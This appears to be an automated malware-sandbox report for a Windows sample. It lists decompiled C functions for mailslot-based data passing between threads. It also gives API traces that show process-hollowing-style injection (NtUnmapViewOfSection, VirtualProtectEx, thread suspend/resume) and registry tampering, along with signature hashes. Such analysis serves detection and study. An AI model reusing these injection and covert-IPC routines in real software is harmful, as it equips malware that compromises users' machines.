    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // "pnls" in little-endian ASCII; executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

Address column of the decompiler view (one address per line of the function body above, in order): 0x00401647 0x0040164f 0x00401664 0x0040166e 0x00401672 0x00401675 0x00401713 0x0040167b 0x0040168c 0x0040168e 0x00401692 0x00401695 0x004016fe 0x00401697 0x004016a0 0x004016a3 0x004016b4 0x004016e7 0x004016bb 0x004016c0 0x004016cd 0x004016d7 0x004016dc 0x004016dc 0x004016cd 0x004016f0 0x004016f0 0x00401704 0x0040170a 0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

Address column of the decompiled view for E004010FB (per-line alignment with the C code lost in extraction; 0x00000000 entries mark lines without an address): 0x004010fb .. 0x004011ef

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

Address column of the decompiled view for E00401033 (per-line alignment with the C code lost in extraction; 0x00000000 entries mark lines without an address): 0x00401033 .. 0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
